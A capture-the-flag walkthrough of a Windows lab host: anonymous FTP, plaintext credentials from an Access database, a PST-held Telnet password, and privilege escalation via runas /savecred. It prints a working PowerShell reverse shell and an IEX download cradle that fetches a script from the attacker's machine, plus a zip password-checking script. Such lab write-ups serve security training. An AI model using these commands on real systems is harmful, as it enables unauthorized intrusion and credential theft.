
Enumeration
Nmap
The Nmap scan shows three services: anonymous FTP, Telnet, and a web server running IIS 7.5. IIS 7.5 ships with Windows Server 2008 R2 (and Windows 7), which dates the host. Nmap confirms that anonymous FTP login is accepted but cannot list the root directory because its passive-mode data connection fails (425), so the share has to be inspected manually. A quick look at the website shows a still image taken from a data centre video feed.
ports=$(nmap -p- --min-rate=1000 -T4 10.129.235.125 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.235.125 -oN nmap_tcp -v
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
HTTP
The web server on port 80 serves a single MegaCorp page with the camera still image and no forms or other input to work with, so attention moves to FTP.
FTP
Reviewing the FTP server turns up two files: backup.mdb in the Backups directory and Access Control.zip in the Engineer directory. Both are binary, so the transfer mode is switched to binary before downloading them (an ASCII-mode transfer would corrupt them). The client's first ls fails in passive mode with the same 425 error nmap hit, then succeeds when the client falls back to active mode with PORT. Note that the machine was reset between the scan and this step, so its IP address changed from 10.129.235.125 to 10.129.235.126.
└──╼ [★]$ ftp 10.129.235.126
Connected to 10.129.235.126.
220 Microsoft FTP Service
Name (10.129.235.126:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
425 Cannot open data connection.
200 PORT command successful.
150 Opening ASCII mode data connection.
08-23-18 09:16PM <DIR> Backups
08-24-18 10:00PM <DIR> Engineer
226 Transfer complete.
ftp> cd Backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> type binary
200 Type set to I.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************************************************| 5520 KiB 423.49 KiB/s 00:00 ETA
226 Transfer complete.
5652480 bytes received in 00:13 (423.48 KiB/s)
ftp> cd ..
250 CWD command successful.
ftp> cd Engineer
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
08-24-18 01:16AM 10870 Access Control.zip
226 Transfer complete.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************************************************| 10870 14.15 KiB/s 00:00 ETA
226 Transfer complete.
10870 bytes received in 00:00 (14.14 KiB/s)
ftp> exit
221 Goodbye.
Inspecting Interesting Files
mdb-tools
Running the file command on backup.mdb confirms that it is a Microsoft Access database. This can be analysed with the mdb-tools suite.
└──╼ [★]$ file backup.mdb
backup.mdb: Microsoft Access Database
The database tables are listed using mdb-tables, with grep colour output applied to highlight the tables of interest.
└──╼ [★]$ mdb-tables backup.mdb | grep --color=auto user
<SNIP> auth_user auth_user_groups auth_user_user_permissions <SNIP>
The schema appears to be a backup from a ZKAccess installation. ZKAccess is an access control application used to manage card readers and the physical security of a site. It contains an auth_user table; exporting it with mdb-export reveals usernames along with plaintext passwords.
└──╼ [★]$ mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access<SNIP>",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
7z
The unzip command refuses the archive with "unsupported compression method 99". Method 99 is not a compression algorithm but the marker for WinZip's AES encryption (the AE-x scheme), which Info-ZIP unzip does not support. Listing the archive with 7z l -slt shows the real detail: the entry is Deflate-compressed and AES-256 encrypted, which 7z can extract given the password.
└──╼ [★]$ unzip "Access Control.zip"
Archive: Access Control.zip
skipping: Access Control.pst unsupported compression method 99
└──╼ [★]$ 7z l -slt "Access Control.zip"
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs DO-Regular (406F1),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Listing archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
----------
Path = Access Control.pst
Folder = -
Size = 271360
Packed Size = 10678
Modified = 2018-08-23 19:13:52
Created = 2018-08-23 18:44:57
Accessed = 2018-08-23 18:44:57
Attributes = A
Encrypted = +
Comment =
CRC = 1D60603C
Method = AES-256 Deflate
Host OS = FAT
Version = 20
Volume Index = 0
The zip file is successfully extracted with the engineer account's password recovered from the auth_user table (the archive came from the Engineer directory).
└──╼ [★]$ 7z x "Access Control.zip"
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs DO-Regular (406F1),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
Enter password (will not be echoed):
Everything is Ok
Size: 271360
Compressed: 10870
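How 7z knows the archive is AES-256, and how a candidate password can be checked cheaply, is worth seeing in code. The following Python is an added example and is not part of the original write-up or of 7-Zip: it assembles a constructed two-entry zip (one stored entry and one marked with method 99 plus a WinZip 0x9901 extra field, whose ciphertext is dummy bytes), walks the central directory the way 7z l does, and then tests a constructed auth_user-style candidate list against the entry's PBKDF2-HMAC-SHA1 password verifier, which is the check 7z and hashcat mode 13600 perform before decrypting anything. The sample password, salt and candidate list are invented; the real archive password is elided on the page.

```python
import hashlib
import io
import struct
import zlib

# Constants from PKWARE's APPNOTE.TXT and the WinZip AES (AE-x) specification.
LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = 0x04034B50, 0x02014B50, 0x06054B50
METHOD_STORED, METHOD_DEFLATE, METHOD_AES = 0, 8, 99
FLAG_ENCRYPTED = 0x0001
AES_EXTRA_ID = 0x9901
AES_BITS = {1: 128, 2: 192, 3: 256}
CD_FMT, LH_FMT = "<IHHHHHHIIIHHHHHII", "<IHHHHHIIIHH"    # 46- and 30-byte fixed headers


def aes_extra_field(strength: int, real_method: int) -> bytes:
    """The 0x9901 extra field: vendor version 2 (AE-2), vendor 'AE', key strength, real method."""
    return struct.pack("<HHH2sBH", AES_EXTRA_ID, 7, 2, b"AE", strength, real_method)


def aes_verifier(password: str, salt: bytes, bits: int) -> bytes:
    """WinZip AES derives enc key + auth key + a 2-byte verifier with PBKDF2-HMAC-SHA1, 1000 rounds."""
    dk = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt, 1000, 2 * (bits // 8) + 2)
    return dk[-2:]


def build_zip(entries) -> bytes:
    """Assemble a one-disk archive from (name, flags, method, crc, stored_bytes, plain_size, extra)."""
    body, central = io.BytesIO(), io.BytesIO()
    for name, flags, method, crc, stored, plain_size, extra in entries:
        nameb, offset = name.encode("ascii"), body.tell()
        fixed = (flags, method, 0, 0x21, crc, len(stored), plain_size, len(nameb), len(extra))
        body.write(struct.pack(LH_FMT, LOCAL_SIG, 51, *fixed) + nameb + extra + stored)
        central.write(struct.pack(CD_FMT, CENTRAL_SIG, 51, 51, *fixed, 0, 0, 0, 0, offset) + nameb + extra)
    cd = central.getvalue()
    eocd = struct.pack("<IHHHHIIH", EOCD_SIG, 0, 0, len(entries), len(entries), len(cd), body.tell(), 0)
    return body.getvalue() + cd + eocd


def inspect_zip(data: bytes) -> list:
    """Walk the central directory; for method-99 entries pull the real method and key size from 0x9901."""
    eocd_at = data.rfind(struct.pack("<I", EOCD_SIG))
    if eocd_at < 0:
        raise ValueError("no end-of-central-directory record")
    count, _cd_size, pos = struct.unpack_from("<HII", data, eocd_at + 10)
    entries = []
    for _ in range(count):
        f = struct.unpack_from(CD_FMT, data, pos)
        if f[0] != CENTRAL_SIG:
            raise ValueError("bad central directory signature at %d" % pos)
        flags, method, nlen, xlen, clen, lh_off = f[3], f[4], f[10], f[11], f[12], f[16]
        extra = data[pos + 46 + nlen: pos + 46 + nlen + xlen]
        lh = struct.unpack_from(LH_FMT, data, lh_off)        # local header: name/extra lengths at 9, 10
        e = {"name": data[pos + 46: pos + 46 + nlen].decode("cp437"), "method": method,
             "encrypted": bool(flags & FLAG_ENCRYPTED), "aes_bits": None,
             "data_offset": lh_off + 30 + lh[9] + lh[10]}
        p = 0
        while method == METHOD_AES and p + 4 <= len(extra):
            xid, xsize = struct.unpack_from("<HH", extra, p)
            if xid == AES_EXTRA_ID and xsize == 7:
                _ver, _vendor, strength, e["method"] = struct.unpack_from("<H2sBH", extra, p + 4)
                e["aes_bits"] = AES_BITS.get(strength)
            p += 4 + xsize
        entries.append(e)
        pos += 46 + nlen + xlen + clen
    return entries


def check_password(data: bytes, entry: dict, password: str) -> bool:
    """Test a candidate against the stored verifier without decrypting (what 7z and hashcat do first)."""
    if entry["aes_bits"] is None:
        raise ValueError("%s is not a WinZip AES entry" % entry["name"])
    salt_len = entry["aes_bits"] // 16                      # 8 / 12 / 16 bytes for 128 / 192 / 256
    start = entry["data_offset"]
    salt, verifier = data[start:start + salt_len], data[start + salt_len:start + salt_len + 2]
    return aes_verifier(password, salt, entry["aes_bits"]) == verifier


def first_working_password(data, name, candidates):
    entry = next(e for e in inspect_zip(data) if e["name"] == name)
    return next((c for c in candidates if check_password(data, entry, c)), None)


# Constructed sample archive: one plain entry, one AES-256 entry whose ciphertext is dummy bytes.
PLAIN = b"constructed stand-in for a mailbox"
SAMPLE_PASSWORD = "Sample-Zip-Pw!"                          # invented; the page elides the real one
SALT = bytes(range(16))                                     # real archives use random salts
AES_BLOB = SALT + aes_verifier(SAMPLE_PASSWORD, SALT, 256) + bytes(len(PLAIN)) + b"\x00" * 10
SAMPLE_ZIP = build_zip([
    ("README.txt", 0, METHOD_STORED, zlib.crc32(PLAIN), PLAIN, len(PLAIN), b""),
    ("Access Control.pst", FLAG_ENCRYPTED, METHOD_AES, 0, AES_BLOB, len(PLAIN), aes_extra_field(3, METHOD_DEFLATE)),
])
CANDIDATES = ["admin", "backup", SAMPLE_PASSWORD]           # constructed, in the style of auth_user

if __name__ == "__main__":
    for e in inspect_zip(SAMPLE_ZIP):
        print(e)
    print("password:", first_working_password(SAMPLE_ZIP, "Access Control.pst", CANDIDATES))
```

The verifier is only two bytes, so a wrong candidate passes about once in 65,536 tries; a match is a strong hint, and the HMAC-SHA1 authentication code at the end of the entry is the definitive check 7z performs after decryption.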
Foothold
The extraction yields Access Control.pst, a Microsoft Outlook Personal Folder file used to store emails and related items. It can be examined with the readpst utility from the pst-utils package:
sudo apt install pst-utils
└──╼ [★]$ readpst -tea -m "Access Control.pst"
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
We install Thunderbird and open the extracted .eml file with it.
sudo apt install thunderbird

The email contains the password for the security account. Using these credentials, a Telnet session can be established and the user flag retrieved. Telnet carries the login and the whole session in cleartext, so anyone on the path can read the password.
└──╼ [★]$ telnet 10.129.235.126
Trying 10.129.235.126...
Connected to 10.129.235.126.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\security
08/23/2018 11:52 PM <DIR> .
08/23/2018 11:52 PM <DIR> ..
08/24/2018 08:37 PM <DIR> .yawcam
08/21/2018 11:35 PM <DIR> Contacts
08/28/2018 07:51 AM <DIR> Desktop
08/21/2018 11:35 PM <DIR> Documents
08/21/2018 11:35 PM <DIR> Downloads
08/21/2018 11:35 PM <DIR> Favorites
08/21/2018 11:35 PM <DIR> Links
08/21/2018 11:35 PM <DIR> Music
08/21/2018 11:35 PM <DIR> Pictures
08/21/2018 11:35 PM <DIR> Saved Games
08/21/2018 11:35 PM <DIR> Searches
08/24/2018 08:39 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 3,340,615,680 bytes free
C:\Users\security>cd Desktop
C:\Users\security\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 8164-DB5F
Directory of C:\Users\security\Desktop
08/28/2018 07:51 AM <DIR> .
08/28/2018 07:51 AM <DIR> ..
09/08/2025 05:35 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,340,615,680 bytes free
C:\Users\security\Desktop>type user.txt
830b<SNIP>12b5
Post-Exploitation
Upgrade from telnet shell
The Telnet shell is limited and not very practical. To obtain a more usable shell, a Python web server is started on the attacking host to serve shell.ps1.
sudo python3 -m http.server 8000
Save the following PowerShell reverse shell one-liner as shell.ps1 in the directory being served; the IP address and port must match the listener.
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.7',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Start a netcat listener on port 443.
sudo nc -nvlp 443
START returns control to the Telnet prompt immediately instead of blocking it for as long as the PowerShell process runs. The /B switch starts the process in the current console rather than a new window (a new window would be unreachable over Telnet), and the empty "" is the window title START expects as its first argument when the command line is quoted. IEX (an alias for Invoke-Expression) executes the downloaded script text directly in memory, so shell.ps1 never touches the target's disk.
C:\Users\security>START /B "" powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.7:8000/shell.ps1')
After running the command, we catch a reverse shell:
└──╼ [★]$ sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.129.235.126] 49160
PS C:\Users\security>
Saved Credentials
Running cmdkey /list
shows that stored credentials exist for the Administrator account.
PS C:\Users\security> cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
Windows can store credentials for various reasons. One common case is a system administrator configuring an application to run with runas /savecred so that users do not have to enter the administrator password every time. The saved credential is tied to the target account (here Domain:interactive=ACCESS\Administrator), not to the application, so once it exists any command run with runas /savecred /user:ACCESS\Administrator will use it and execute with that account's privileges.
Administrators may use this approach to save time, bypass application whitelisting, or grant write access to protected directories. Typically, runas /savecred is configured within a shortcut (.lnk file). The following commands enumerate all shortcut files on the system and report those that reference runas.
Get-ChildItem -Path C:\ -Filter *.lnk -Recurse -Force -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName | Out-File shortcuts.txt
ForEach ($file in Get-Content .\shortcuts.txt) { if (Select-String -Path $file -Pattern runas -Quiet) { Write-Output $file } }
It seems that the ZKAccess shortcut on the Public Desktop has been configured in this way.
<SNIP>
C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk
<SNIP>
runas.exe???:1??:1?*Yrunas.exe
L-K??E?C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico?%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico
<SNIP>
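Parsing the shortcut properly, instead of grepping its raw bytes, makes the runas arguments unambiguous. The following Python is an added example and not from the original write-up: it builds a constructed .lnk carrying the same strings the dump above shows (the item ID list bytes are dummies) and parses the MS-SHLLINK StringData section to recover the target's command-line arguments and the /user: account named with /savecred. On the host itself the same fields are exposed through the WScript.Shell COM object, e.g. (New-Object -ComObject WScript.Shell).CreateShortcut($path).Arguments.

```python
import struct

# ShellLink (.lnk) layout from MS-SHLLINK: 76-byte header, optional IDList and LinkInfo, then StringData.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData fields appear in exactly this order, each present only if its LinkFlags bit is set.
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELPATH), ("working_dir", HAS_WORKDIR),
                 ("arguments", HAS_ARGS), ("icon_location", HAS_ICON)]
HEADER_FMT = "<I16sIIQQQIIIHHII"          # size, CLSID, flags, attrs, 3 FILETIMEs, size, icon, show, hotkey, reserved


def build_lnk(fields: dict, unicode: bool = True, idlist: bytes = b"") -> bytes:
    """Serialise a minimal shortcut (no LinkInfo block) so the parser has realistic input."""
    flags = (IS_UNICODE if unicode else 0) | (HAS_IDLIST if idlist else 0)
    for key, bit in STRING_FIELDS:
        if key in fields:
            flags |= bit
    out = struct.pack(HEADER_FMT, 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    if idlist:
        out += struct.pack("<H", len(idlist)) + idlist     # IDListSize excludes the size field itself
    for key, _bit in STRING_FIELDS:
        if key in fields:
            text = fields[key]
            encoded = text.encode("utf-16-le") if unicode else text.encode("cp1252")
            out += struct.pack("<H", len(text)) + encoded   # CountCharacters, not byte length
    return out


def parse_lnk(blob: bytes) -> dict:
    """Return the StringData fields; IDList and LinkInfo are skipped using their own size prefixes."""
    size, clsid, flags = struct.unpack_from("<I16sI", blob, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    pos = 0x4C
    if flags & HAS_IDLIST:
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]
    if flags & HAS_LINKINFO:
        pos += struct.unpack_from("<I", blob, pos)[0]        # LinkInfoSize includes itself
    fields = {}
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", blob, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = blob[pos:pos + width * count]
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += width * count
    return fields


def savecred_account(blob: bytes):
    """Account named by /user: when the shortcut passes /savecred to its target, else None."""
    tokens = parse_lnk(blob).get("arguments", "").split()
    if not any(t.lower() == "/savecred" for t in tokens):
        return None
    return next((t[len("/user:"):] for t in tokens if t.lower().startswith("/user:")), None)


# Constructed samples. ZK_LNK mirrors the strings visible in the ZKAccess shortcut dump;
# its item ID list is dummy data (one 4-byte item followed by the 2-byte terminator).
ZK_LNK = build_lnk({
    "relative_path": r"..\..\..\Windows\System32\runas.exe",
    "working_dir": r"C:\ZKTeco\ZKAccess3.5",
    "arguments": r'/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"',
    "icon_location": r"%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico",
}, idlist=struct.pack("<H", 4) + b"\x1f\x50" + b"\x00\x00")
BENIGN_LNK = build_lnk({"relative_path": r"..\notepad.exe", "arguments": r"C:\notes.txt"}, unicode=False)

if __name__ == "__main__":
    for label, blob in (("ZKAccess", ZK_LNK), ("benign", BENIGN_LNK)):
        print(label, parse_lnk(blob), "->", savecred_account(blob))
```

Because the parser skips the IDList and LinkInfo blocks by their size fields, it works on shortcuts whose absolute target lives only in those blocks; the relative path and arguments are what matter for spotting runas /savecred.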
When listing the Public user profile, the Desktop folder does not appear because it carries the hidden attribute (Get-ChildItem omits hidden items unless -Force is given). It can still be entered by path and listed. Its ACL grants read and execute to NT AUTHORITY\INTERACTIVE, and any user who logs on interactively, whether at the console, over Remote Desktop, or through Telnet, carries the INTERACTIVE SID (S-1-5-4) in their access token, as the whoami /groups output below confirms.
PS C:\Users\security> ls C:\Users\Public
Directory: C:\Users\Public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r-- 7/14/2009 6:06 AM Documents
d-r-- 7/14/2009 5:57 AM Downloads
d-r-- 7/14/2009 5:57 AM Music
d-r-- 7/14/2009 5:57 AM Pictures
d-r-- 7/14/2009 5:57 AM Videos
PS C:\Users\security> icacls C:\Users\Public\Desktop
C:\Users\Public\Desktop BUILTIN\Administrators:(OI)(CI)(F)
NT AUTHORITY\INTERACTIVE:(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
ACCESS\Administrator:(OI)(CI)(IO)(DE,DC)
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\security> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ========================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
ACCESS\TelnetClients Alias S-1-5-21-953262931-566350628-63446256-1000 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group
Privilege Escalation
Exploiting runas /savecred
The following command, run from the Telnet session, launches a PowerShell reverse shell as ACCESS\Administrator; because the credential is saved, runas does not prompt for a password. A fresh nc listener is needed first (if the first shell is still connected on 443, point shell.ps1 at a different port). The root flag is then retrieved from the Administrator's Desktop.
C:\Users\security>runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.7:8000/shell.ps1')"
└──╼ [★]$ sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.129.235.126] 49167
PS C:\Windows\system32> whoami
access\administrator
PS C:\Users\Administrator\Desktop> cat root.txt
23e9<SNIP>ca7b